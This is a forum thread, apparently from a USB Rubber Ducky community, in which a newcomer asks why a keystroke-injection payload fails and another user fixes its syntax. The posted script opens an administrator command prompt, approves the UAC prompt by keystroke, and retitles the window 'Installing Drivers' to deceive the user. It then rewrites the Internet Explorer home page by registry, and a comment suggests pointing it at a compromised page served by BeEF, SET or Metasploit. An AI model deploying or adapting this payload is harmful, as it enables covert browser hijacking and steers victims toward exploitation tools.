Jump to content

[Question][Payload] Some problems (newbie regarding the Ducky)


Recommended Posts

Hey,

Have some issues with the ducky.. or most probably it's something I do wrong..

When I try to run below script:

REM Description: Change the users home page - simple but effective
REM Author: PrikleyPaw
REM ---- Command Prompt Admin DuckSauce v.02 ----
ESCAPE
CONTROL ESCAPE
STRING cmd /T:01
MENU
STRING a
DELAY 400
ALT Y
DELAY 200
STRING @echo off && mode con:COLS=15 LINES=1 && title Installing Drivers
ENTER
DELAY 250
REM Change www.yahoo.com to what ever you want their home page to be...
REM Good to change to compromised page (beef, set, metasploit).
STRING cmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d www.yahoo.com /f
STRING exit
ENTER

I get this error message:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Windows\system32>CMD /C reg add "hkey_current_user\sOFTWARE\mICROSOFT\iNTERNET eXPLORER\mAIN" /V "sTART pAGE" /D WWW.YAHOO.COM /FEXIT
ERROR: Invalid syntax.
Type "REG ADD /?" for usage.
 
C:\Windows\system32>
Edited by midnitesnake
formatting [code] tags
Link to comment
Share on other sites

try changing the cmd /c string to

STRING reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d www.yahoo.com /f EXIT

reg might be case sensitive on the /v /d /f; you appear to have CAPS enabled, what happens when you disable CAPS_LOCK?

Edited by midnitesnake
Link to comment
Share on other sites

Problem solved! And yeah, stupid me having CAPS on :P

But that's how you learn, by making all the mistakes ;)

Thanks!

try changing the cmd /c string to

STRING reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d www.yahoo.com /f EXIT

reg might be case sensitive on the /v /d /f; you appear to have CAPS enabled, what happens when you disable CAPS_LOCK?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...